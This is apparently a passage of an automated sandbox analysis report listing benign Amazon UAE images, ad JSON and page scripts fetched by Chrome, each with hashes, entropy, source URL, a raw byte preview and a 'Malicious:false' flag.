                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.................................................... ..,+++,1111111111............................................!!..!!))())1111111111..........Adobe.d...........t...."......................................................................................!.1A.."#2Qaq.Br..$35Rs...%7C...Sb.............................!1..2AQaq.."4R...#Sbs................?...._9...." ...""...." ...""...." ......._9...." ...6.p...EU5/W......m.m..3..;P/*..IGAV..;.d.xuC6..E..Y.I]./.=~........q..CQ...1..3.4..b...}..$..i$...I...../v}.c..j=ai.ih......#.H....<.F8^/...y8.C;K%.....F.....k....p.H._.....R..'dml.F.o........8...WV..mvJx..s.u@..D.s...$.9P=X..k..T.....Pa.X..au.....zo/.....;.?O.-6)<t.M.5}v....{..V.H.3.3d...$nG......-6z.3...........n....B..*+....P.'..F...9.7#........>.._#.YT.c..`.G.XM...l...RMm.{<.:_.O..m...Qu.......uY.9.?5....TMG....WH..`....i......Tj.CCO.5...&.4L.D.N^.........K!...'...fs.^6....g..&.\t4O.(.r.5.(.....l..e@..." ......._9...." ...+.......c. ..A^...M.!
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):2505
                                                                                                                                                                                                                                                                      Entropy (8bit):7.57821258014142
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:Q49FzEk6I87i/7btk9QTMYQuBBeCx+jkgfotZzVKOQ5J04/3JQA2v:/9hEkUi/ZMGJ3QJZwn
                                                                                                                                                                                                                                                                      MD5:002622B77205566964885B74BF6DFED2
                                                                                                                                                                                                                                                                      SHA1:5ADD68A03B70A9AB3C6942F7211CC81F413FDC9B
                                                                                                                                                                                                                                                                      SHA-256:42EAAEC6B2FC15562C3616C2C1510B7C9F37E2FB6908C21956DCE1CA6076EAAC
                                                                                                                                                                                                                                                                      SHA-512:5BF09C3AFB54BBD6ABB0C1B78796E79A5D6477BCD0D8756820990842F315A1CF30F1BCE0CDBA03A6326841ACD294EBCF7E5B4AE8F35FCF4AA9C69AD2313057BD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334875_186x116_1X_en_AE_4._SY116_CB597773556_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................t...."..........8........................................................................7...........8s.t..F.....T..-.T......Dyo}.NFw......*...*.}n..)..=.).*....:..../F.O.........._...<Ye}....2...p.C...j.E....F...........UG..J..l.. ....q.r.-.u....<.Q........ .j...A.|-L.y${.....-...Q..Z.n8p......3?.o./D...h.t..X......._...............P.............................!.$1@EUa..%45ATdu......&DFPQeqv.........6GV..............?..c6.........oKY(...o...x...JD....3.-_hz.Ih...1....4j....>?L;.....l.U..S&.L..FC.}m..x~Y.-h.K_F)%M\.Z..\.......T^}}...7.}.j..=...B........$.....&......|.........nF6R.,5b..Q.M.8.uQ...ui......^........1.c\.."..M.nA..(L ..Z...7..j...m.&...........*...E.$.Gv.......Y..p@Bc...,...6("'.6...F.f.&..bH.+..Q....K..}#1..P...d%...m..O_/.s3..=C0..9..K.J~U.q]...~...........&..G...S.`....O...u}._.....)
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4343
                                                                                                                                                                                                                                                                      Entropy (8bit):7.910105969959965
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TmbtbFE66jfm++yVJozJupaz7i4Z/oYeW1q6TgpDF67:qbtbe3VyzJup0i4ZRj1gpDFM
                                                                                                                                                                                                                                                                      MD5:312209B764DFCEBAA32CCEE6EEDD1F29
                                                                                                                                                                                                                                                                      SHA1:73067B74F112A032C91D6978BA1A60034E140029
                                                                                                                                                                                                                                                                      SHA-256:7431B3E875E0F31B91BC167DA88599904C6F040F207560E776AA519AB405AEF1
                                                                                                                                                                                                                                                                      SHA-512:3D3F96EDFF3BE6DAC8C01E8E2E0C0BD73F2F9AB38CF999213CBA1F7B3A29C30FC313403EDD76F6DA52C8569AF4F5BA80B4939D272C97F58930C26C786F80D387
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!.."1AQ2t...#aqs......%Rr......45Td...$6BSb...CU................................................1!A.2..".QR............?.&.7....76.F.%|...3l....Nm.:..o....x.X..i:9|..V....~.@.L..Nmd?...`..]...R.3./......*,....Q.Z.t....*...H.....v....H.).[.XF....u..X..X......W....P.h.....$Y".3......2(M.j....U%...M:Q.6.+.kg...^.J.R.. .n..[i.3.d.tG..%.N.H...$c.....&.S.P.Uf....4..$.5.5X....8(..1.]....5f..Z.{k..jD++za8O.m<*.|.*.j;9Qs.6Y..[Zh.'..U.d...7} .Gx.$r+...8.+.5..L.}.o...*.lY....{.N....|.....|..3...y.......uU/$...;.........f..........[.5........h.sF_|?%..k .......Z.[..S...Q.....2.....{.P.".8..T.)W.+M.M<./Z...I.p...C^.s.j......QSB.Xt.&+.D....r......h].U..z...5of.r.....VVN.}.....B.m..2....]8.l. ..!.S.v$H..dc....w.........T.T.L...M....7Z..k2
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):50354
                                                                                                                                                                                                                                                                      Entropy (8bit):7.969356113927722
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:2+BpaF79Y5UZ+C/5sjkCo0G3KD1apWtdAN+f:dBpaFAc+s5sj6aApWtdAN+f
                                                                                                                                                                                                                                                                      MD5:CCEA032C567035C0AC54F72BB8AAE20D
                                                                                                                                                                                                                                                                      SHA1:061C5C8B0C5E78A3BD58B162A1B048B576C864E9
                                                                                                                                                                                                                                                                      SHA-256:9F5E5847FBCC02B660F73B9A3C9BFC5406EE2B4268A06E331418A88C46393754
                                                                                                                                                                                                                                                                      SHA-512:CA16905E047A69133A8DA957BC92C9C2084FE042569789085BAD3ACFEE7E86343531088321F5AB684204428B5C6490BCBC0515CD040038F1FEAE6D722D8ED855
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................................:.................................................................................\a.....]...p.m..6..yw..T.Z..J..v....O.65...@.............l=......c.Q......v^..r...a%.!.9..yw............i..V..\...<.8..........D.6.g`m..8O.................."HZ.mt.........yP.&{F...X_.........ec..C..+1............/.lw.;&.w.@.@..........;[...E..........*.......-J....k.....=..x.......P...x.#..:r........qR..aa...8.`..V..rJ......n7"{G..............mM.r.......GT....*..o..V..p$>1.}x.>y......J....j.gm......Sr?..#H....j....s..p........mz.rO(q}{...6.+8.9U<....ls.....Fu.[[...7.yG-..Q.....v.9.A5.,..:...,...nj...~.....?......>..|..~o.._.H........!1....6........e...`.y.....{.t.....o.."f..l:...`.K.25.7.................Q....2'~..=?x...X..?.,..s3..9.&o.+^.......p......7....xs....[...`...W.}.B..%.`.....3..6q...@.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x318, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):22635
                                                                                                                                                                                                                                                                      Entropy (8bit):7.962935004379811
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:Ia/uDkXIqV5NaNWapaJtimqKtrctTJlil1lRfsYR9vaQjJ436bU/aa39IxAEFA:Ia/RXl/NaN9paJtimhtrc5mPFvHJ43Lt
                                                                                                                                                                                                                                                                      MD5:79EE21BE3145CD7561F900B1B5890CD1
                                                                                                                                                                                                                                                                      SHA1:8F2274D3885B03E25A8D3FC5D5A5BA0DCFB8DCAF
                                                                                                                                                                                                                                                                      SHA-256:B42B043636E6E8D4B80D3BC02635F40B6372E0C61F7EAC491A48B3B88DC367A3
                                                                                                                                                                                                                                                                      SHA-512:A57C7BC8BEA01D40C2DD3173A8463E5CBAD7811A37707372900B5676C2976BC3C1D67B85BFC90E025AB9BF9838F1C7129394D716F2A64D9121178E331794ACC0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/718yTiyJ3eL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......>.@.."..........6...................................................................X...D.. ..~M....z..Y...X..................\..5..-@......u\..&.v.IF..K.(l.....1.................3&.n=.+u.......Fg.|.p..:.r..Q....s@&............!.....E.(...S......cV..}>s.M.....!....OkCg8.`............~...9.........Jl......+Q.U..*..S.fy.;..A.F9..T.FE.J.........ATnI...9.6+..nJr..FB@...5....b8...>..M2..r.._...&............@..Sw.:].QZ&.%....I..j4.jfb.m....$....ZX....(sL....<.. ..v..f;........0@9.#...fu.j..Z7:..K0K......L..gu.0......` .8..w62....I.....E..2$...m..9. .+e..I..6....'.(..W..g.(......1....... .........Ec.m..4z..P(.:V...c.=)QS..KT.h..L...m}h..%E..j.i+...M..4..\..UB..A..........waWXz.4..>.`.{h.<.ie....(Ql....].....]...l.....e...P.d3.......?....:.K........)0..O...X...g..y.,r..x...e.Y..[..M.v.G.U."...3.%.0.`U
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):55925
                                                                                                                                                                                                                                                                      Entropy (8bit):7.933767658859196
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:bCB4xA5nOxbjWgdAe1HFfzVSaDHD1dH3qiNaVqkuJ:OB4xA5nO1pdlHJj7qpVqkG
                                                                                                                                                                                                                                                                      MD5:49BEEF4C5F357B2C05816C6832FE9082
                                                                                                                                                                                                                                                                      SHA1:2E2A0CE2286C221D0E9791ED357B4E60BA17A3A3
                                                                                                                                                                                                                                                                      SHA-256:E067E4A544715CA6438FDC74881532130ED11527A34EE759E2E89EA5F5A84956
                                                                                                                                                                                                                                                                      SHA-512:A25BEC5FEB4DCFDB9057153DE0FA2750929162AD031778B306A061959C773A04384CA0C93A289C7008AA474EBA4C9B9EEF5FA3AA3F10CAFBE0674A68D31153D9
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/51lqWMfJwgL._SX1500_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................X...."..........7.....................................................................~4.................................r.......$...X.`Lr...b....,...%.A..!(.... ..<.......v<c.3......c&X.B..BL....C.h.....................................g;.=A..#..../.q..M..I..z.}Z.;MW.OP{...5@X...e..Q.I...........q.Z'...=]..r......1.JH .....;..Z ..................g'..L.Q....|.>.|.>.|.>.|.>.|.>.|.>.|.>.|.>.z..X~.+.......@.............]...qx>#.x.c?.~e.\.z#..>..$...$..>.@.,.......X....X.....X....:..../................. .......................>...r......:.....@.iz<...K...............u.t=.......W..O......?....0......\...........P..<~.....Sc..y.......s...?K.b~..l~..o... .......!......I2.....@....2.r.d0Zj.}.G.y.._............v..4@..................=...........................................1..W................#.S.O7.....|...Z.C[.5
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x309, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):24761
                                                                                                                                                                                                                                                                      Entropy (8bit):7.969036592461493
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:+3QUPOIpomgYZxXd6aFnIStjV7VOIp1jUqE1uwrxA6N9:arO1mvZhd65QjxMW1jUq0u8Bz
                                                                                                                                                                                                                                                                      MD5:42346FC288B0E8C032EF2A7C89F2AAC2
                                                                                                                                                                                                                                                                      SHA1:FB21F894D8421CBCF79D98A1F8088D4362D81E5D
                                                                                                                                                                                                                                                                      SHA-256:43CC3F9BE65995D4F19BE9FC0695BADAAAC4D1C70084F57B3CB585C2FE632782
                                                                                                                                                                                                                                                                      SHA-512:0573D1BEE3DB864B1128A6C85310423BC9E21F01CA0E02D33CD2D0B559AC6E69EE905926A3EEC7AE60C057CDC166DD374D2D20F7FB26014F71E6F76FDE1819F0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......5.@.."..........6...................................................................X................jQ?n...g_J..m...h&.....................o....h.a.......I.=..F-..e.U..Ob.>#U..v.o.......'.&.............*.N...e...^.%...].7.f...6;...v...[..+.p..z.f...'.x..6..W....,.....i.............,.{.u.M..A.....9K......u.....aY.l..&#..*..UT{2..6...:B...<..>..w...=...gW..X.........#2..9d...(..9p.$.a..1...6.........M."hs.r....N2.F..^..oB..%.9.l..\y..!..X...C.y..+.........L.T.5.M..:Ub...|.q..%.t%.+.F....D..3.,..Q..MV.Q.;M. i..Q...".V.h..........d`.dhv.v...H..\."9b..:.y..V. ....'2r.F..../.m3Y....+&.3[...^...9.&`...........i5.=...d...YN:>.]...i.m.w*.....Q....}....zr>Q.{N...%..o..X...GhZ&e.>...b.............cY..3.._O....=.[p..[eG.I...72....d{m...].Z.3.....+s..!!..6..z)jn....h.......P.....i...<....6\...ky....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 250x250, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10744
                                                                                                                                                                                                                                                                      Entropy (8bit):7.954071830123213
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:LpVjx586PXW8xgiegDtTnVgtKEiy1jDBMb25FHGXu7upZo3TzX:LpFTFXW9ItTnVgcBy1jGK5FOCAujL
                                                                                                                                                                                                                                                                      MD5:E8DA125C7B54BBED1484300C271A73BE
                                                                                                                                                                                                                                                                      SHA1:F8A8D4838F56673A1EC3ADD778CA8E5D95364C0A
                                                                                                                                                                                                                                                                      SHA-256:C1B528B8E47B4C662BDAEB6487DD8EACBAD97A603D9A8244EE5522893E488DE6
                                                                                                                                                                                                                                                                      SHA-512:1C6FCCD1BD922AAB2CC8171430F2A02B146F20E3207CAA355536CBE984ED8C670B797A2DD36C3DAEFE981E41A126B43A6500548CBDF8D4809B7D3B74AEC43A76
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.........................!.....+....'...'.''.#'##,'!!',#');)0+5,)8););::=BC;'BZ..........!8'.,:0.)E:C,:=::+L:C8:#;:,55,,0)0:,==;.+=8'Q+,':8B5'=H..........."...............................................................!1A."Q.2aq..B...#Rr....Cs...3..5Sb.$c.................................................!..1A.."2Qa#..R.bq.............?...Jp......g..*..#....9..?Z...k2(.G...,O..\...............a.?./.r.N|......{X2d.W...T.g..,n...g. O.....R..."H..........FQ.#.D..!.=......c..f.*........K...~a+........U...a`]....;..h...R~r7.....D...V4%"Hy.r.$}=....%..{......|-\_iz}.3.Ii..1.s]....M~`....C<.o..*.i..@. U.dFI.....h.V.....G(Lg..4q=...~.(*k"./.4.F...$......N...l...i..'..{.[.V....%(.q..l..?i9....V.....Xz8.*..'.'p.\.S.R.........#[...NI..=Xqh..O.. eNE1.]h....O.V.R".QE.QE..E.P..Q@.QE.QE..E.P..Q@#.T..D.#..RCa..A.....H..g.....c.E.L..)...R.p....~....P...{.X...h.b...$.].. ...`"....f.m!.o.....$...$......yf.6........,j..Z4..BN......X......c....@././4....a...yp[.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x80, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):6790
                                                                                                                                                                                                                                                                      Entropy (8bit):7.6962554568499275
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1EzpGDhVerICPnrcsyyyyyyyyyyyyyyyyyyyyyy5RhQDisMiEBkhxbq+:1Etuu/Lyyyyyyyyyyyyyyyyyyyyyyd74
                                                                                                                                                                                                                                                                      MD5:19A2A563792ED91EAF1B6EA5B8B353E9
                                                                                                                                                                                                                                                                      SHA1:6CCD5B6EE0637885FF8207A5979F39F116595DEC
                                                                                                                                                                                                                                                                      SHA-256:242624DC423E4FB2F6EF9F61668DA58F25A39A3D598C0B9C69136B859519988A
                                                                                                                                                                                                                                                                      SHA-512:64FA204CA1B640061847994E5A6514EC5FA6EBE04D7C74B114AAF132013712E3E5DD231607BC58DC5065C47F78ACB6EA433D9802F5335AEC3A871529B765360A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Desktop-Exercise-fitness-1500x80.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........P...."...............................................x................................................\~.........3.G@.1....Q$..............q..........r.DD|{...S.YM]Y.O3u..[....N.?R1_3P.[.3q....................;.Z..5....}.c....jU.7.=.5J.s.....r^.E..[.....V....................;.._......Un..:'.:.-Z..u..._..^M.y?a.FN...s..z..........\~..........b.ubn..].....O.a.%Y.M^.....<.t.=...J.5)Y...............................................................e................................................................ ...................dw.c ............z.N......d.....X....;fo...s.SR.`....................................................................!?@....G....e...=v._...yx.....z....p[.f..;.9......o...6.............7.n..o.[=.nUp..........................+............................2`....456p 0E........../K..i-
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4764
                                                                                                                                                                                                                                                                      Entropy (8bit):5.122937839350743
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:IdNI4zHJcrr09EbtreSDOlArl7y0uqYD40STfKAHSTfXAk4wpU:IQ4zpcX09EY+wAR7yAk4fKAAXAk4wpU
                                                                                                                                                                                                                                                                      MD5:10891A11972E457F3F0156D78151A9DE
                                                                                                                                                                                                                                                                      SHA1:26B5AA5066986F858B9CD0F5B704C50E0E71CB89
                                                                                                                                                                                                                                                                      SHA-256:6EF8CE7F9E3C4FB6C85CA7E10B671D80E8BB5C87902EF8D1BDFEDE5DFCC6B5B6
                                                                                                                                                                                                                                                                      SHA-512:F8B9E25F8A4ACF1EB056647DD39A818E69BACD950823A5183D8BEA8641F62C7F81FCD16FDA4EF4243882D513CFCAE3EDD73B4E648874C654C58E8B1F8392D698
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22adElementId%22%3A%22ape_Gateway_right-2_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22slotName%22%3A%22right-2%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D&daFlg=false&ie=UTF-8&quot;, &quot;name&quot;:&quot;shared-placement-feedback-modal-right-2&quot;,&quot;header&quot;:&quot;Leave feedback&quot;,&quot;width&quot;:&quot;460&quot;}\" style=\"position: absolute; top: 2px; right: 0px; display: inline-
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43035
                                                                                                                                                                                                                                                                      Entropy (8bit):7.934677596166583
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:4YyDrz5nZ8lyC6sCowenpT8xpphnevbs6o+seP8+gxBAFWKNhv7QhrUAFLe1gRaF:4xCly0CowenpTGf6o9e0xBiW8v0RJsue
                                                                                                                                                                                                                                                                      MD5:80FA247C4B70291638CCF3D72A421E4D
                                                                                                                                                                                                                                                                      SHA1:C82DEC2B7B7594A830637A0F6F1C8CAB0180F505
                                                                                                                                                                                                                                                                      SHA-256:A4785DD397DB26B9986DA2C4B7976F5A97AE97C0579CCD183F45A8B7672F4A5E
                                                                                                                                                                                                                                                                      SHA-512:7EBA080D1ED87D884AD43C41C6469E7CC8663530B6732C2EC2ECF2589854C0AB36EBDC0894CDCF4CA613A230565823D852455D8E53B3832C9EE72363EE17E59B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_CL_HomePersonalcare_400x400_EN._CB567012733_.jpg
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):28041
                                                                                                                                                                                                                                                                      Entropy (8bit):7.940888881929444
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:IkfcpJX9NFlbdeUmqCZRmwfR8ythN9y+rF:Iuc/tZbQLLyyrDF
                                                                                                                                                                                                                                                                      MD5:B48076436C13EB9BCA267D9E7E06AAD3
                                                                                                                                                                                                                                                                      SHA1:66DA30C46B916E298C9018644D401B834B2D3540
                                                                                                                                                                                                                                                                      SHA-256:DF8A55E3B49C7070A313B4850E7E535AD6D3AD307FFAB448F80644AB453B6B46
                                                                                                                                                                                                                                                                      SHA-512:FFD002E71D10F3C5C5FFC46B0D846DAC7381976C0D9A88429B37F32F07C763233F2AC6F9BEAC243EE5A40D01F4E013107F02E3DF99720C55617C6C38445C62D4
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C.......................................................................,...."..........................................D.............................!1..."AQ..2a#q......$34Br..').9ux......................................?..........................!..1A.."Qa2q.#.R.....$3B...47Cbr...............?..C..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..l.%.k.=a...S.t.K.G8,..&eT* B.EU...j..L^(......!.....K..#..."(..".]........0..... U.8tP...y.Ye,'x..$|.E....3.:.9...8C..J4.V..D.:.s(......G^.....z.=....3..........M_.Vk...........bZ&..Rh.Vz.:.r..&....2~_n..e..9Dm.o.<<..R9].[.H.*..Qc..Eb."..L........../G1I.&0. .).........
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (592)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):259505
                                                                                                                                                                                                                                                                      Entropy (8bit):5.513895391206618
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:OXoXk8Hk3BVobj3ECtbkwNHNFgkP6GctQE9vDUoNtEB7l62O9xqfLPl4b3asjneJ:OXoXkCSjob0xcd4b3asjeIZdBET01a
                                                                                                                                                                                                                                                                      MD5:EA332AA0E4574CE35E0407A1007453F4
                                                                                                                                                                                                                                                                      SHA1:157F430E39FF13ED9AC9B7B6295418ADFF4D89AB
                                                                                                                                                                                                                                                                      SHA-256:2EB99FD1CC80353D1BC041D7A198D441D59A6FB550D42C6E1B49B6D86378B683
                                                                                                                                                                                                                                                                      SHA-512:0A425ADE876E55A887136785B9C0016DE9164476BFBA3ED70247EBCF66369AC10BA1C597BD8D2A87DAAF32AF7825894554695F15345AD9B68086CA3EA886F9A3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/01mbLYIbb6L._RC%7C41-4RLDamPL.js,11wHuOJ6dmL.js,11M1v288N+L.js,01M-022sD8L.js,51dsOFIMKsL.js,01SSs1udVFL.js,21Jciu5efEL.js,11sDO1cl2sL.js,21yQHHvePIL.js,31rPGUuqZNL.js,11qUt8zUeaL.js,31QsYC6+8NL.js,31-5CxRnizL.js,01GT6fWw-jL.js,01sN19mMRBL.js,41L7-0VQDJL.js,31WfLtys3fL.js,01rpWr9mG8L.js,11+a2G-PjQL.js,01uQOuVgu9L.js,011tWqHAdjL.js,21dHHtMY2XL.js,21k8j-9GwVL.js,41xK9HQHzGL.js,21vKD6pQ0hL.js,31CMoqydOSL.js,316+p4J0KjL.js_.js?AUIClients/ProductUIServiceAssets-vrkzrcf5p7mia2ppuqe05j3jfq"
                                                                                                                                                                                                                                                                      Preview:(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("ProductUIAssets@addToCart",""):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});./* ******** */.(function(v){var g=window.AmazonUIPageJS||window.P,w=g._namespace||g.attributeErrors,b=w?w("ProductUIAssets@digitalBundleSubscriptionTerms",""):g;b.guardFatal?b.guardFatal(v)(b,window):b.execute(function(){v(b,window)})})(function(v,g,w){!function(b){function d(a){a.when("A","jQuery","upsell-container-side-sheet","upsell-container-events","puis-upsell-metric-utils","ready").register("mou-sidesheet-event-handler",function(c,a,b,f,e){c.declarative("puis-upsell-sidesheet-action","click",function(a){var k=.a.data.preloadDomId;a.$event&&(a.$event.stopPropagation(),a.$event.preventDefault());b.showSheet(k);e.registerMetric(f.SIDE_SHEET_CLICKED,1);c.trigger(f.SIDE_SHEET_CLICKED,a)});c.declarative("puis-upsell-sidesheet-overlay","click",function(c){b.hideSheet(c
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65433)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):786341
                                                                                                                                                                                                                                                                      Entropy (8bit):5.547907794693936
